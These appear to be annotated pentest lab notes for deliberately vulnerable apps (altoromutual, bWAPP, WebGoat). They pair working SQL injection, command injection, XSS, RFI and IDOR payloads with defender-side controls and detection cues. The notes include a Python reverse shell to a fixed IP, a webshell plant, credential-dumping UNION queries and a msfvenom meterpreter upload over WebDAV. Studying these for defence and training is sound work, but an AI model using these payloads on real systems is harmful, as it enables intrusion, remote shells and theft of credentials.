# Lab pentest notes against deliberately vulnerable apps (altoromutual demo bank, a MySQL "security"
# database, bWAPP, WebGoat). <RHOST>/<LHOST>/<RPORT>/<LPORT> are placeholders filled in per lab.
# Each section below is annotated from the defender's side: the root cause the probe relies on,
# the control that closes it, and what the activity looks like in logs.

# --- SQL injection: login form (`uid`) and a `?id=` parameter ---
# Root cause: the request value reaches the query as string text, which is why a stray `'` and the
# `--+` comment terminator change the statement. Control: bind every value as a query parameter and
# give the web DB account no SELECT on information_schema / mysql. Detection: `UNION SELECT`,
# `information_schema`, `group_concat(`, `version()`, `@@datadir` in request parameters, and the
# sqmap default User-Agent, are high-signal for request-log alerting.
sqlmap -u "http://altoromutual.com/bank/login.aspx" --data="uid=admin&passw=pass&btnSubmit=Login" -p uid
jesse' or '1'='1 101 or 1=1
# `ORDER BY 4` here is the column-count probe that precedes the UNION payloads below; the responses
# differ only by an error, so error pages with SQL text in them are themselves the leak to remove.
?id=1' or 1=1 --+ ?id=1' ORDER by 4 -- +
# Local mysql client session used to reproduce the UNION behaviour directly against the database.
mysql -u jesse -p use mysql; use security; SELECT * FROM users WHERE id='1' UNION SELECT 1,2,3;
# Schema and credential enumeration via information_schema and a group_concat over `users`:
# every line below reads data the application never needed to expose, so least-privilege grants
# on the DB account limit the blast radius even when the injection itself is missed.
?id=99999' UNION SELECT 1,2,3 --+ ?id=99999' UNION SELECT 1,version(),database() --+ ?id=99999' UNION SELECT 1,user(),@@datadir --+ ?id=-1' UNION SELECT * FROM users WHERE id='-1' union SELECT 1, group_concat(DISTINCT table_schema SEPARATOR ', '),3 FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' --+
?id=-1' UNION SELECT * FROM users WHERE id='-1' union SELECT 1, group_concat(DISTINCT column_name SEPARATOR ', '),3 FROM information_schema.columns WHERE table_schema='security' --+
?id=-1' union select 1,group_concat(username SEPARATOR ', '), group_concat(password SEPARATOR ', ') from users --+
# Blind variants: boolean (`AND 1=1` vs `AND 1=2`, page differs) and time-based (`sleep(5)`,
# response stalls). Detection signal is a burst of near-identical requests differing only in the
# `id` value, plus a cluster of ~5 s responses on one endpoint.
?id=1 ?id=1' AND 1=1 --+ ?id=1' AND 1=2 --+
mysql -u jesse -p use security; select database(); select length(database()); select substr(database(),1,1); select ascii(substr(database(),1,1)); ?id=1' AND (ascii(substr((select database()),1,1))) = ascii --+ select sleep(5); select if((select ascii(substr((select database()),1,1))) = 115, sleep(5), null); ?id=1' AND if((select ascii(substr((select database()),1,1))) = 115, sleep(5), null) --+

# --- PHP code/command injection (`?message=...;system(...)`) ---
# `message` looks like it is evaluated as PHP (the `;system(...)` suffix runs). Control: never pass
# request input to eval(); run PHP with `disable_functions` covering system/exec/shell_exec and with
# phpinfo() unreachable in production. The `cp ... php-backdoor.php` step plants a webshell in the
# web root: file-integrity monitoring on /var/www/html and a read-only web root catch it.
phpinfo() ?message=1;system('cat /proc/version'); ?message=test;system('grep -A 5 1001 /etc/passwd');
?message=test;system('hostname'); ?message=test;system('whoami'); ?message=test;system('pwd');cp /usr/share/webshells/php/php-backdoor.php /var/www/html/php-backdoor.php.txt service apache2 start
# Reverse shell: outbound TCP from the web tier to 192.168.112.4:4444 with /bin/sh attached.
# Controls: egress filtering from the web tier, and alerting when the web server process spawns
# /bin/sh or python. The pty line only upgrades the shell to an interactive terminal.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty; pty.spawn("/bin/bash")'
# Packet capture on eth1 to evidence the above for the report.
tcpdump -nnttttAi eth1

# --- Network/TLS checks: Heartbleed, anonymous FTP, POODLE ---
# Heartbleed (openssl_heartbleed scanner): control is a patched OpenSSL, re-verified by re-running the
# scan. Anonymous FTP: disable it, or accept that the capture on ports 20/21 shows the session in
# cleartext. POODLE (ssl-poodle script on 8443): disable SSLv3 on the listener.
$ msfconsole
msf> use auxiliary/scanner/ssl/openssl_heartbleed
msf> set RPORT <RPORT>
msf> set RHOSTS <RHOST>
msf> set VERBOSE true
msf> run
$ ftp <RHOST> anonymous
$ tcpdump -nnttttAi eth1 port 20 or port 21
$ nmap -p8443 --script ssl-poodle

# --- XXE fragments (entity references; the DOCTYPE that defines them is not on this page) ---
# Control: disable external entity and DTD resolution in the XML parser (the parser-level flag,
# not input filtering). Detection: `<!DOCTYPE` / `<!ENTITY` in request bodies to XML endpoints.
]> AAAAA&xxe;
]>&bWAPP;bar

# --- IDOR (WebGoat profile PUT) ---
# The profile id in the path (2342388) and `userId`/`role` in the body are all client-controlled;
# the session cookie is the only trustworthy identity. Control: resolve the subject from the
# session server-side and ignore ids/roles supplied in the request; ignore or reject
# X-HTTP-Method-Override unless a documented client needs it.
PUT /WebGoat/IDOR/profile/2342388 HTTP/1.1
Host: localhost:8080
Referer: http://localhost:8080/WebGoat/start.mvc
Content-Type: application/json;
charset=utf-8
X-Requested-With: XMLHttpRequest
X-HTTP-Method-Override: POST
Cookie: JSESSIONID=39726650BD8229CE454E1B5F177CF883
Connection: close
Content-Length: 120
{ "role" : 1, "color" : "red", "size" : "small", "name" : "Buffalo Bill", "userId" : "2342388" }

# (typo: `anonynmous`; the intended form `anonymous` is used earlier on this page)
$ ftp <RHOST> anonynmous

# --- Remote file inclusion (bWAPP rlfi.php `language=`) ---
# Control: allow_url_include=Off and a fixed allow-list of language values instead of a path.
# Detection: `http://` or `%00` inside a parameter that is meant to be a filename.
[web]bWAPP/rlfi.php?language=http://<LHOST>/evil.txt
# The trailing null byte (%00) truncates the '.php' suffix that older PHP versions appended to the include path
[web]bWAPP/rlfi.php?language=http://<LHOST>/evil.txt%00

# --- WebDAV upload to code execution ---
# dirb/nikto locate the DAV share; cadaver then uploads a PHP payload, renames it to .php and marks
# it executable, with a Metasploit handler waiting for the callback. Controls: no unauthenticated
# PUT/MOVE/PROPPATCH on the web root, no script execution from upload locations. Detection: PUT and
# MOVE methods in the access log, and new .php files appearing under the DAV path.
$ dirb http://<RHOST> | grep -i webdav
$ nikto -h http://<RHOST>/webdav/
$ cadaver http://<RHOST>/webdav/
dav> mget *
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f raw -o evil.txt
dav> put evil.txt
$ msfconsole
msf> use exploit/multi/handler
msf> set LHOST <LHOST>
msf> set LPORT <LPORT>
msf> set PAYLOAD php/meterpreter_reverse_tcp
msf> exploit
dav> move evil.txt evil.php
dav> chexec evil.php

# --- XSS (reflected, DOM via the `start.mvc#test/` fragment, and a JSON/script context breakout) ---
# Control: output-encode for the exact context (HTML body vs. attribute vs. script/JSON), and a CSP
# without 'unsafe-inline' so an injected <script> does not run. `webgoat.customjs.phoneHome()` is
# the lab's own callback proving execution. The last line closes a JSON string/array and a <script>
# tag before injecting, so data embedded inside <script> must be JSON-encoded with `</` escaped.
javascript:alert(document.cookie);
<script>alert('my javascript here')</script>
start.mvc#test/
http://localhost:9090/WebGoat/start.mvc#test/<script>alert('DOM XSS works')</script>
http://localhost:8080/WebGoat/start.mvc#test/<script>webgoat.customjs.phoneHome();</script>
<script>alert('Vulnerable to XSS')</script>
"}]}';</script><script>alert('Vulnerable to XSS')</script>